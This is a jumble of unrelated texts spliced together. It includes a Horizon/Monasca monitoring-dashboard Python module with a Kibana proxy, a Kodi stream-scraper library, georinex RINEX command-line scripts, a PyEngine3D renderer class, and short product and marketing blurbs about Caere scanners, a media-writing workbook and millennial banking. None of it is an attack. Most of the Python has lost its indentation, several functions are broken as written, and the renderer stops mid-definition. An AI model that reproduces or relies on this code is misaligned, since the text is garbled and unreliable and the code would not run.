# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
    non_project_keys = {'fileName', 'title'}
    global_links = None
    try:
for project_link in settings.DASHBOARDS:
key = list(project_link)[0]
value = list(project_link.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.DASHBOARDS
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
                global_links = value
        return global_links if global_links is not None else settings.DEFAULT_LINKS
    except Exception:
        LOG.warning("Failed to parse dashboard links by project, returning defaults.")
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.DASHBOARDS
def get_monitoring_services(request):
#
    # MONITORING_SERVICES is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
    non_project_keys = {'name', 'groupBy'}
    global_services = None
    try:
for group in settings.MONITORING_SERVICES:
key = list(group.keys())[0]
value = list(group.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.MONITORING_SERVICES
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
                global_services = value
        return global_services if global_services is not None else settings.MONITORING_SERVICES
    except Exception:
        LOG.warning("Failed to parse monitoring services by project, returning defaults.")
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.MONITORING_SERVICES
def show_by_dimension(data, dim_name):
if 'metrics' in data:
dimensions = []
for metric in data['metrics']:
if 'dimensions' in metric:
if dim_name in metric['dimensions']:
dimension = metric['dimensions'][dim_name]
dimensions.append(dimension)
return dimensions
return []
def get_status(alarms):
if not alarms:
return 'chicklet-notfound'
status_index = 0
for a in alarms:
severity = alarm_tables.show_severity(a)
        severity_index = index_by_severity.get(severity, 0)
status_index = max(status_index, severity_index)
return priorities[status_index]['status']
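# Illustrative example (not in the original module): for alarms whose
# severities are ['LOW', 'CRITICAL'], the CRITICAL entry has the highest
# priority, so get_status() returns 'btn-danger'; an empty alarm list
# returns 'chicklet-notfound'.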
def generate_status(request):
try:
alarms = api.monitor.alarm_list(request)
except Exception as e:
messages.error(request,
_('Unable to list alarms: %s') % str(e))
alarms = []
alarms_by_service = {}
for a in alarms:
service = alarm_tables.get_service(a)
service_alarms = alarms_by_service.setdefault(service, [])
service_alarms.append(a)
monitoring_services = copy.deepcopy(get_monitoring_services(request))
for row in monitoring_services:
row['name'] = str(row['name'])
if 'groupBy' in row:
alarms_by_group = {}
for a in alarms:
groups = show_by_dimension(a, row['groupBy'])
if groups:
for group in groups:
group_alarms = alarms_by_group.setdefault(group, [])
group_alarms.append(a)
services = []
for group, group_alarms in alarms_by_group.items():
name = '%s=%s' % (row['groupBy'], group)
# Encode as base64url to be able to include '/'
# encoding and decoding is required because of python3 compatibility
# urlsafe_b64encode requires byte-type text
name = 'b64:' + base64.urlsafe_b64encode(name.encode('utf-8')).decode('utf-8')
service = {
'display': group,
'name': name,
'class': get_status(group_alarms)
}
service['icon'] = get_icon(service['class'])
services.append(service)
row['services'] = services
else:
for service in row['services']:
service_alarms = alarms_by_service.get(service['name'], [])
service['class'] = get_status(service_alarms)
service['icon'] = get_icon(service['class'])
service['display'] = str(service['display'])
return monitoring_services
class IndexView(TemplateView):
template_name = constants.TEMPLATE_PREFIX + 'index.html'
def get_context_data(self, **kwargs):
if not policy.check((('monitoring', 'monitoring:monitoring'), ), self.request):
raise exceptions.NotAuthorized()
context = super(IndexView, self).get_context_data(**kwargs)
try:
region = self.request.user.services_region
context["grafana_url"] = getattr(settings, 'GRAFANA_URL').get(region, '')
except AttributeError:
# Catches case where Grafana 2 is not enabled.
proxy_url_path = str(reverse_lazy(constants.URL_PREFIX + 'proxy'))
api_root = self.request.build_absolute_uri(proxy_url_path)
context["api"] = api_root
context["dashboards"] = get_dashboard_links(self.request)
# Ensure all links have a 'raw' attribute
for link in context["dashboards"]:
link['raw'] = link.get('raw', False)
context['can_access_kibana'] = policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
context['enable_log_management_button'] = settings.ENABLE_LOG_MANAGEMENT_BUTTON
context['enable_event_management_button'] = settings.ENABLE_EVENT_MANAGEMENT_BUTTON
context['show_grafana_home'] = settings.SHOW_GRAFANA_HOME
return context
class MonascaProxyView(TemplateView):
template_name = ""
def _convert_dimensions(self, req_kwargs):
"""Converts the dimension string service:monitoring into a dict
This method converts the dimension string
service:monitoring (requested by a query string arg)
into a python dict that looks like
{"service": "monitoring"} (used by monasca api calls)
"""
dim_dict = {}
if 'dimensions' in req_kwargs:
dimensions_str = req_kwargs['dimensions'][0]
dimensions_str_array = dimensions_str.split(',')
for dimension in dimensions_str_array:
# limit splitting since value may contain a ':' such as in
# the `url` dimension of the service_status check.
dimension_name_value = dimension.split(':', 1)
if len(dimension_name_value) == 2:
name = dimension_name_value[0]
value = dimension_name_value[1]
dim_dict[name] = urllib.parse.unquote(value)
else:
raise Exception('Dimensions are malformed')
#
# If the request specifies 'INJECT_REGION' as the region, we'll
# replace with the horizon scoped region. We can't do this by
# default, since some implementations don't publish region as a
# dimension for all metrics (mini-mon for one).
#
if 'region' in dim_dict and dim_dict['region'] == 'INJECT_REGION':
dim_dict['region'] = self.request.user.services_region
req_kwargs['dimensions'] = dim_dict
return req_kwargs
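    # Illustrative only (not in the original module): a query string of
    # dimensions=service:monitoring,url:http%3A%2F%2Fhost is converted to
    # {'dimensions': {'service': 'monitoring', 'url': 'http://host'}}.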
def get(self, request, *args, **kwargs):
# monasca_endpoint = api.monitor.monasca_endpoint(self.request)
restpath = self.kwargs['restpath']
results = None
parts = restpath.split('/')
if "metrics" == parts[0]:
req_kwargs = dict(self.request.GET)
self._convert_dimensions(req_kwargs)
if len(parts) == 1:
results = {'elements': api.monitor.
metrics_list(request,
**req_kwargs)}
elif "statistics" == parts[1]:
results = {'elements': api.monitor.
metrics_stat_list(request,
**req_kwargs)}
elif "measurements" == parts[1]:
results = {'elements': api.monitor.
metrics_measurement_list(request,
**req_kwargs)}
elif "dimensions" == parts[1]:
results = {'elements': api.monitor.
metrics_dimension_value_list(request,
**req_kwargs)}
if not results:
LOG.warning("There was a request made for the path %s that"
" is not supported." % restpath)
results = {}
return HttpResponse(json.dumps(results),
content_type='application/json')
class StatusView(TemplateView):
template_name = ""
def get(self, request, *args, **kwargs):
ret = {
'series': generate_status(self.request),
'settings': {}
}
return HttpResponse(json.dumps(ret),
content_type='application/json')
class _HttpMethodRequest(urllib.request.Request):
def __init__(self, method, url, **kwargs):
urllib.request.Request.__init__(self, url, **kwargs)
self.method = method
def get_method(self):
return self.method
def proxy_stream_generator(response):
while True:
chunk = response.read(1000 * 1024)
if not chunk:
break
yield chunk
class KibanaProxyView(generic.View):
base_url = None
http_method_names = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD']
def read(self, method, url, data, headers):
proxy_request_url = self.get_absolute_url(url)
proxy_request = _HttpMethodRequest(
method, proxy_request_url, data=data, headers=headers
)
try:
response = urllib.request.urlopen(proxy_request)
except urllib.error.HTTPError as e:
return http.HttpResponse(
e.read(),
status=e.code,
content_type=e.hdrs['content-type']
)
except urllib.error.URLError as e:
            return http.HttpResponse(e.reason, status=404)
else:
status = response.getcode()
proxy_response = http.StreamingHttpResponse(
proxy_stream_generator(response),
status=status,
content_type=response.headers['content-type']
)
if 'set-cookie' in response.headers:
proxy_response['set-cookie'] = response.headers['set-cookie']
return proxy_response
@csrf_exempt
def dispatch(self, request, url):
if not url:
url = '/'
if request.method not in self.http_method_names:
return http.HttpResponseNotAllowed(request.method)
if not self._can_access_kibana():
error_msg = (_('User %s does not have sufficient '
'privileges to access Kibana')
% auth_utils.get_user(request))
LOG.error(error_msg)
return http.HttpResponseForbidden(content=error_msg)
# passing kbn version explicitly for kibana >= 4.3.x
headers = {
"X-Auth-Token": request.user.token.id,
"kbn-version": request.META.get("HTTP_KBN_VERSION", ""),
"Cookie": request.META.get("HTTP_COOKIE", ""),
"Content-Type": "application/json",
}
return self.read(request.method, url, request.body, headers)
def get_relative_url(self, url):
url = urllib.parse.quote(url.encode('utf-8'))
params_str = self.request.GET.urlencode()
if params_str:
return '{0}?{1}'.format(url, params_str)
return url
def get_absolute_url(self, url):
return self.base_url + self.get_relative_url(url).lstrip('/')
def _can_access_kibana(self):
return policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
|
Ability to reverse-engineer Caere units.
To send in your Caere unit for repair use the shipping address below.
If you have any technical questions or wish to offer technical information about any Caere units then fill out the form below. |
import boogietools as bt
import sys
import xbmcgui
class livelib():
def __init__(self):
self.timeout=None
def scrape(self,scraper,*args,**kwargs):
try:
module=__import__("scrapers",fromlist=[scraper])
scraper_function=getattr(module,scraper)
except Exception,e:
type="ERROR: LIVELIB | No scraper for %s"%scraper
result=e
return type,result
try:
type,result=scraper_function.run(*args,**kwargs)
except Exception,e:
type="ERROR: LIVELIB | Scraper \'%s\' can't scrape the service"%scraper
result=e
return type,result
header="*************** LIVELIB %s ARGUMENTS ***************"%type.upper()
print header
for k,v in result.iteritems():
print "%s:%s"%(k,str(v))
print "*"*len(header)
return type,result
def scrape_url(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
if "tcUrl" in params.keys():
url = self._escape_rtmp(params["tcUrl"])
params.pop("tcUrl")
if not self.timeout is None:
params["timeout"]=self.timeout
for k,v in params.iteritems():
if k=="conn":
for kc in sorted(v.keys()):
url+=" conn=%s"%self._escape_rtmp(v[kc])
continue
url+=" %s=%s"%(k,self._escape_rtmp(v))
return type,url
else:
return "ERROR: LIVELIB | Can't detect stream type %s"%type,""
if type in ["m3u","m3u8"]:
return type,params
def scrape_li(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
item = xbmcgui.ListItem(path=str(params["tcUrl"]))
params.pop("tcUrl")
for k,v in params.iteritems():
item.setProperty(str(k), str(v))
return type,item
else:
return "ERROR: LIVELIB | Can't convert stream type %s to ListItem"%type,None
def _escape_rtmp(self,s):
s=str(s)
escaped=[" ","?","&"]
for c in escaped:
if c in s:
s=s.replace(c,"\\%s"%hex(ord(c))[2:])
return s |
Exercises in Media Writing offers students multiple opportunities to practice their writing skills in-class or as take-home assignments. Each chapter includes review questions and writing-prompt activities to help students master the concepts and skills presented in Vincent F. Filak’s second edition of Dynamics of Media Writing. Additional exercises built around the unique demands of online newswriting will prepare students to meet the demands of a changing media landscape. Key Features: Review Questions help students recall and master core chapter concepts; Writing Exercises enable students to recall and demonstrate their understanding of various elements found in each chapter of Dynamics of Media Writing, Second Edition. |
import argparse
from pathlib import Path
import numpy as np
from datetime import timedelta
import logging
import georinex as gr
def georinex_read():
"""
    Reads a RINEX 2/3 OBS/NAV file and plots it (or converts it to NetCDF4 / HDF5).
    Returns data as an xarray.Dataset; think of it as an N-dimensional NumPy ndarray
    with lots of metadata and very fancy indexing methods.
Xarray can be thought of as an analytically-tuned Pandas.
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# read RINEX files (NAV/OBS, Rinex 2 or 3, Hatanaka, etc.)
georinex_read ~/data/VEN100ITA_R_20181580000_01D_MN.rnx.gz
georinex_read ~/data/ABMF00GLP_R_20181330000_01D_30S_MO.zip
# read a limited range of time in a RINEX file
georinex_read ~/data/PUMO00CR__R_20180010000_01D_15S_MO.rnx -t 2018-01-01 2018-01-01T00:30
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("rinexfn", help="path to RINEX 2 or RINEX 3 file")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
p.add_argument("-interval", help="read the rinex file only every N seconds", type=float)
P = p.parse_args()
data = gr.load(
P.rinexfn,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
interval=P.interval,
)
# %% plots
if P.plot:
import georinex.plots as grp
from matplotlib.pyplot import show
grp.timeseries(data)
show()
else:
print(data)
def georinex_plot():
"""
PyRINEX plotting example
includes how to index by satellite, measurement type and time
"""
import matplotlib.dates as md
from matplotlib.pyplot import figure, show
p = argparse.ArgumentParser(description="Plot raw Rinex data")
p.add_argument("rinexfn", help="RINEX file to analyze")
p.add_argument("sv", help="SVs to analyze e.g. G14 C12", nargs="+")
p.add_argument(
"-t",
"--tlim",
help="time limits (start stop) e.g. 2017-05-25T12:47 2017-05-25T13:05",
nargs=2,
)
p.add_argument(
"-w", "--what", help="what measurements to plot e.g. L1C", nargs="+", default=["L1C", "P1"]
)
P = p.parse_args()
rinexfn = Path(P.rinexfn).expanduser()
obs = gr.load(rinexfn, use="G")
# %% optional time indexing demo
# can use datetime or string
# boolean indexing -- set "i=slice(None)" to disable time indexing.
if P.tlim is not None:
i = (obs.time >= np.datetime64(P.tlim[0])) & (obs.time <= np.datetime64(P.tlim[1]))
else:
i = slice(None)
# %% plot
SV = P.sv
what = P.what
# FIXME: make these title automatic based on requested measurement?
# titles = ['Psedoranges of GPS and Glonass', 'Carrier Phase', 'Doppler', 'Signal Strength']
# ylabels = ['Pseudoranges', 'Phase', 'Doppler', 'signal strength']
fg = figure(figsize=(9, 9))
axs = fg.subplots(4, 1, sharex=True)
    for v, ax in zip(what, axs):
        if v not in obs:
            continue
        Satobs = obs[v][i].sel(sv=SV).dropna(dim="time", how="all")
        Satobs.plot(ax=ax)
        ax.set_title(v)
        ax.set_ylabel(v)
ax.legend(loc="center left", bbox_to_anchor=(1, 0.5))
axs[-1].set_xlabel("Time [UTC]")
axs[-1].xaxis.set_major_formatter(md.DateFormatter("%Y-%m-%dT%H:%M"))
fg.suptitle(f"{rinexfn.name} satellite {SV}")
show()
def rinex2hdf5():
"""
Converts RINEX 2/3 NAV/OBS to NetCDF4 / HDF5
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# batch convert RINEX OBS2 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*o"
rnx2hdf5.py ~/data "*o.Z"
rnx2hdf5.py ~/data "*o.zip"
# batch convert RINEX OBS3 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*MO.rnx"
rnx2hdf5.py ~/data "*MO.rnx.gz"
# batch convert compressed Hatanaka RINEX files to NetCDF4 / HDF5
rnx2hdf5.py ~/data "*.crx.gz"
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files to convert")
p.add_argument("glob", help="file glob pattern", nargs="?", default="*")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
P = p.parse_args()
gr.batch_convert(
P.indir,
P.glob,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
)
def georinex_time():
p = argparse.ArgumentParser()
p.add_argument("filename", help="RINEX filename to get times from")
p.add_argument("-glob", help="file glob pattern", nargs="+", default="*")
p.add_argument("-v", "--verbose", action="store_true")
p = p.parse_args()
filename = Path(p.filename).expanduser()
print("filename: start, stop, number of times, interval")
if filename.is_dir():
flist = gr.globber(filename, p.glob)
for f in flist:
eachfile(f, p.verbose)
elif filename.is_file():
eachfile(filename, p.verbose)
else:
raise FileNotFoundError(f"{filename} is not a path or file")
def eachfile(fn: Path, verbose: bool = False):
try:
times = gr.gettime(fn)
except ValueError as e:
if verbose:
print(f"{fn.name}: {e}")
return
# %% output
Ntimes = times.size
if Ntimes == 0:
return
ostr = f"{fn.name}:" f" {times[0].isoformat()}" f" {times[-1].isoformat()}" f" {Ntimes}"
hdr = gr.rinexheader(fn)
interval = hdr.get("interval", np.nan)
    if not np.isnan(interval):
ostr += f" {interval}"
Nexpect = (times[-1] - times[0]) // timedelta(seconds=interval) + 1
if Nexpect != Ntimes:
logging.warning(f"{fn.name}: expected {Nexpect} but got {Ntimes} times")
print(ostr)
if verbose:
print(times)
def georinex_loc():
"""
Visualize location of all receivers on map,
where color & size are proportional to measurement interval (smaller is better)
"""
from matplotlib.pyplot import show
import georinex.plots_geo as grp
import georinex.geo as gg
p = argparse.ArgumentParser(description="plot receiver locations")
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files")
p.add_argument(
"-glob",
help="file glob pattern",
nargs="+",
default=["*o", "*O.rnx", "*O.rnx.gz", "*O.crx", "*O.crx.gz"],
)
p = p.parse_args()
indir = Path(p.indir).expanduser()
flist = gr.globber(indir, p.glob)
locs = gg.get_locations(flist)
grp.receiver_locations(locs)
show()
|
80 million American Millennials are poised to transform banking forever. They present a once-in-a-generation opportunity for community banks to show how they understand, value and embrace this new generation.
Since over 80 percent of Millennials ranked a quality mobile banking app as a must-have, we created a branded mobile package for the bank, marketed through digital advertising that included pay-per-click, banner ads and a pre-roll video ad on Facebook. We also used traditional channels including outdoor, radio and in-branch to round out the media mix.
In just six weeks, the CBT Gen Y campaign drove over 10,000 potential new customers to a responsive landing page that led them along the sales path. Retargeting will keep them coming back.
As revealed in "Inside the Millennial Mind," many brands are missing the point by continuing to push traditional life markers such as getting married, buying a home and starting a family, because that was what drove older generations' purchasing habits. Millennials rank inward-focused values like happiness and discovery higher than collective-focused values. |
from ctypes import c_void_p
import math
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from PyEngine3D.Common import logger, COMMAND
from PyEngine3D.Common.Constants import *
from PyEngine3D.Utilities import *
from PyEngine3D.OpenGLContext import InstanceBuffer, FrameBufferManager, RenderBuffer, UniformBlock, CreateTexture
from .PostProcess import AntiAliasing, PostProcess
from . import RenderTargets, RenderOption, RenderingType, RenderGroup, RenderMode
from . import SkeletonActor, StaticActor, ScreenQuad, Line
from . import Spline3D
class Renderer(Singleton):
def __init__(self):
self.initialized = False
self.view_mode = GL_FILL
# managers
self.core_manager = None
self.viewport_manager = None
self.resource_manager = None
self.font_manager = None
self.scene_manager = None
self.debug_line_manager = None
self.render_option_manager = None
self.rendertarget_manager = None
self.framebuffer_manager = None
self.postprocess = None
# components
self.viewport = None
self.debug_texture = None
self.blend_enable = False
self.blend_equation = GL_FUNC_ADD
self.blend_func_src = GL_SRC_ALPHA
self.blend_func_dst = GL_ONE_MINUS_SRC_ALPHA
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
# scene constants uniform buffer
self.uniform_scene_buffer = None
self.uniform_scene_data = None
self.uniform_view_buffer = None
self.uniform_view_data = None
self.uniform_view_projection_buffer = None
self.uniform_view_projection_data = None
self.uniform_light_buffer = None
self.uniform_light_data = None
self.uniform_point_light_buffer = None
self.uniform_point_light_data = None
self.uniform_particle_common_buffer = None
self.uniform_particle_common_data = None
self.uniform_particle_infos_buffer = None
self.uniform_particle_infos_data = None
# material instances
self.scene_constants_material = None
self.debug_bone_material = None
self.shadowmap_material = None
self.shadowmap_skeletal_material = None
self.static_object_id_material = None
self.skeletal_object_id_material = None
self.selcted_static_object_material = None
self.selcted_skeletal_object_material = None
self.selcted_object_composite_material = None
self.render_color_material = None
self.render_heightmap_material = None
# font
self.font_instance_buffer = None
self.font_shader = None
self.actor_instance_buffer = None
self.render_custom_translucent_callbacks = []
def initialize(self, core_manager):
logger.info("Initialize Renderer")
self.core_manager = core_manager
self.viewport_manager = core_manager.viewport_manager
self.viewport = self.viewport_manager.main_viewport
self.resource_manager = core_manager.resource_manager
self.render_option_manager = core_manager.render_option_manager
self.font_manager = core_manager.font_manager
self.scene_manager = core_manager.scene_manager
self.debug_line_manager = core_manager.debug_line_manager
self.rendertarget_manager = core_manager.rendertarget_manager
self.postprocess = PostProcess()
self.postprocess.initialize()
self.framebuffer_manager = FrameBufferManager.instance()
# material instances
self.scene_constants_material = self.resource_manager.get_material_instance('scene_constants_main')
self.debug_bone_material = self.resource_manager.get_material_instance("debug_bone")
self.shadowmap_material = self.resource_manager.get_material_instance("shadowmap")
self.shadowmap_skeletal_material = self.resource_manager.get_material_instance(name="shadowmap_skeletal",
shader_name="shadowmap",
macros={"SKELETAL": 1})
self.static_object_id_material = self.resource_manager.get_material_instance(name="render_static_object_id",
shader_name="render_object_id")
self.skeletal_object_id_material = self.resource_manager.get_material_instance(name="render_skeletal_object_id",
shader_name="render_object_id",
macros={"SKELETAL": 1})
self.selcted_static_object_material = self.resource_manager.get_material_instance("selected_object")
self.selcted_skeletal_object_material = self.resource_manager.get_material_instance(name="selected_object_skeletal",
shader_name="selected_object",
macros={"SKELETAL": 1})
self.selcted_object_composite_material = self.resource_manager.get_material_instance("selected_object_composite")
self.render_color_material = self.resource_manager.get_material_instance(name="render_object_color", shader_name="render_object_color")
self.render_heightmap_material = self.resource_manager.get_material_instance(name="render_heightmap", shader_name="render_heightmap")
# font
self.font_shader = self.resource_manager.get_material_instance("font")
self.font_instance_buffer = InstanceBuffer(name="font_offset", location_offset=1, element_datas=[FLOAT4_ZERO, ])
# instance buffer
self.actor_instance_buffer = InstanceBuffer(name="actor_instance_buffer", location_offset=7, element_datas=[MATRIX4_IDENTITY, ])
# scene constants uniform buffer
program = self.scene_constants_material.get_program()
self.uniform_scene_data = np.zeros(1, dtype=[('TIME', np.float32),
('JITTER_FRAME', np.float32),
('RENDER_SSR', np.int32),
('RENDER_SSAO', np.int32),
('SCREEN_SIZE', np.float32, 2),
('BACKBUFFER_SIZE', np.float32, 2),
('MOUSE_POS', np.float32, 2),
('DELTA_TIME', np.float32),
('SCENE_DUMMY_0', np.int32)])
self.uniform_scene_buffer = UniformBlock("scene_constants", program, 0, self.uniform_scene_data)
self.uniform_view_data = np.zeros(1, dtype=[('VIEW', np.float32, (4, 4)),
('INV_VIEW', np.float32, (4, 4)),
('VIEW_ORIGIN', np.float32, (4, 4)),
('INV_VIEW_ORIGIN', np.float32, (4, 4)),
('PROJECTION', np.float32, (4, 4)),
('INV_PROJECTION', np.float32, (4, 4)),
('CAMERA_POSITION', np.float32, 3),
('VIEW_DUMMY_0', np.float32),
('NEAR_FAR', np.float32, 2),
('JITTER_DELTA', np.float32, 2),
('JITTER_OFFSET', np.float32, 2),
('VIEWCONSTANTS_DUMMY0', np.float32, 2)])
self.uniform_view_buffer = UniformBlock("view_constants", program, 1, self.uniform_view_data)
self.uniform_view_projection_data = np.zeros(1, dtype=[('VIEW_PROJECTION', np.float32, (4, 4)),
('PREV_VIEW_PROJECTION', np.float32, (4, 4))])
self.uniform_view_projection_buffer = UniformBlock("view_projection", program, 2,
self.uniform_view_projection_data)
self.uniform_light_data = np.zeros(1, dtype=[('SHADOW_MATRIX', np.float32, (4, 4)),
('LIGHT_POSITION', np.float32, 3),
('SHADOW_EXP', np.float32),
('LIGHT_DIRECTION', np.float32, 3),
('SHADOW_BIAS', np.float32),
('LIGHT_COLOR', np.float32, 3),
('SHADOW_SAMPLES', np.int32)])
self.uniform_light_buffer = UniformBlock("light_constants", program, 3, self.uniform_light_data)
self.uniform_point_light_data = np.zeros(MAX_POINT_LIGHTS, dtype=[('color', np.float32, 3),
('radius', np.float32),
('pos', np.float32, 3),
('render', np.float32)])
self.uniform_point_light_buffer = UniformBlock("point_light_constants", program, 4, self.uniform_point_light_data)
self.uniform_particle_common_data = np.zeros(1, dtype=[
('PARTICLE_COLOR', np.float32, 3),
('PARTICLE_ALIGN_MODE', np.int32),
('PARTICLE_CELL_COUNT', np.int32, 2),
('PARTICLE_BLEND_MODE', np.int32),
('PARTICLE_COMMON_DUMMY_0', np.int32)
])
self.uniform_particle_common_buffer = UniformBlock("particle_common", program, 5, self.uniform_particle_common_data)
self.uniform_particle_infos_data = np.zeros(1, dtype=[
('PARTICLE_PARENT_MATRIX', np.float32, (4, 4)),
('PARTICLE_DELAY', np.float32, 2),
('PARTICLE_LIFE_TIME', np.float32, 2),
('PARTICLE_TRANSFORM_ROTATION_MIN', np.float32, 3),
('PARTICLE_FADE_IN', np.float32),
('PARTICLE_TRANSFORM_ROTATION_MAX', np.float32, 3),
('PARTICLE_FADE_OUT', np.float32),
('PARTICLE_TRANSFORM_SCALE_MIN', np.float32, 3),
('PARTICLE_OPACITY', np.float32),
('PARTICLE_TRANSFORM_SCALE_MAX', np.float32, 3),
('PARTICLE_ENABLE_VECTOR_FIELD', np.int32),
('PARTICLE_VELOCITY_POSITION_MIN', np.float32, 3),
('PARTICLE_VECTOR_FIELD_STRENGTH', np.float32),
('PARTICLE_VELOCITY_POSITION_MAX', np.float32, 3),
('PARTICLE_VECTOR_FIELD_TIGHTNESS', np.float32),
('PARTICLE_VELOCITY_ROTATION_MIN', np.float32, 3),
('PARTICLE_MAX_COUNT', np.uint32),
('PARTICLE_VELOCITY_ROTATION_MAX', np.float32, 3),
('PARTICLE_SPAWN_COUNT', np.uint32),
('PARTICLE_VELOCITY_SCALE_MIN', np.float32, 3),
('PARTICLE_VELOCITY_STRETCH', np.float32),
('PARTICLE_VELOCITY_SCALE_MAX', np.float32, 3),
('PARTICLE_VELOCITY_ACCELERATION', np.float32),
('PARTICLE_VECTOR_FIELD_MATRIX', np.float32, (4, 4)),
('PARTICLE_VECTOR_FIELD_INV_MATRIX', np.float32, (4, 4)),
('PARTICLE_SPAWN_VOLUME_INFO', np.float32, 3),
('PARTICLE_SPAWN_VOLUME_TYPE', np.uint32),
('PARTICLE_SPAWN_VOLUME_MATRIX', np.float32, (4, 4)),
('PARTICLE_VELOCITY_LIMIT', np.float32, 2),
('PARTICLE_FORCE_GRAVITY', np.float32),
('PARTICLE_PLAY_SPEED', np.float32),
('PARTICLE_VELOCITY_TYPE', np.uint32),
('PARTICLE_FORCE_ELASTICITY', np.float32),
('PARTICLE_FORCE_FRICTION', np.float32),
('PARTICLE_DUMMY_0', np.uint32),
])
self.uniform_particle_infos_buffer = UniformBlock("particle_infos", program, 6, self.uniform_particle_infos_data)
def get_rendering_type_name(rendering_type):
rendering_type = str(rendering_type)
return rendering_type.split('.')[-1] if '.' in rendering_type else rendering_type
rendering_type_list = [get_rendering_type_name(RenderingType.convert_index_to_enum(x)) for x in range(RenderingType.COUNT.value)]
self.initialized = True
# Send to GUI
self.core_manager.send_rendering_type_list(rendering_type_list)
def close(self):
pass
def render_custom_translucent(self, render_custom_translucent_callback):
self.render_custom_translucent_callbacks.append(render_custom_translucent_callback)
def set_blend_state(self, blend_enable=True, equation=GL_FUNC_ADD, func_src=GL_SRC_ALPHA, func_dst=GL_ONE_MINUS_SRC_ALPHA):
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
self.blend_enable = blend_enable
if blend_enable:
self.blend_equation = equation
self.blend_func_src = func_src
self.blend_func_dst = func_dst
glEnable(GL_BLEND)
glBlendEquation(equation)
glBlendFunc(func_src, func_dst)
else:
glDisable(GL_BLEND)
def restore_blend_state_prev(self):
self.set_blend_state(self.blend_enable_prev,
self.blend_equation_prev,
self.blend_func_src_prev,
self.blend_func_dst_prev)
def set_view_mode(self, view_mode):
if view_mode == COMMAND.VIEWMODE_WIREFRAME:
self.view_mode = GL_LINE
elif view_mode == COMMAND.VIEWMODE_SHADING:
self.view_mode = GL_FILL
def reset_renderer(self):
self.scene_manager.update_camera_projection_matrix(aspect=self.core_manager.game_backend.aspect)
self.framebuffer_manager.clear_framebuffer()
self.rendertarget_manager.create_rendertargets()
self.scene_manager.reset_light_probe()
self.core_manager.gc_collect()
def ortho_view(self, look_at=True):
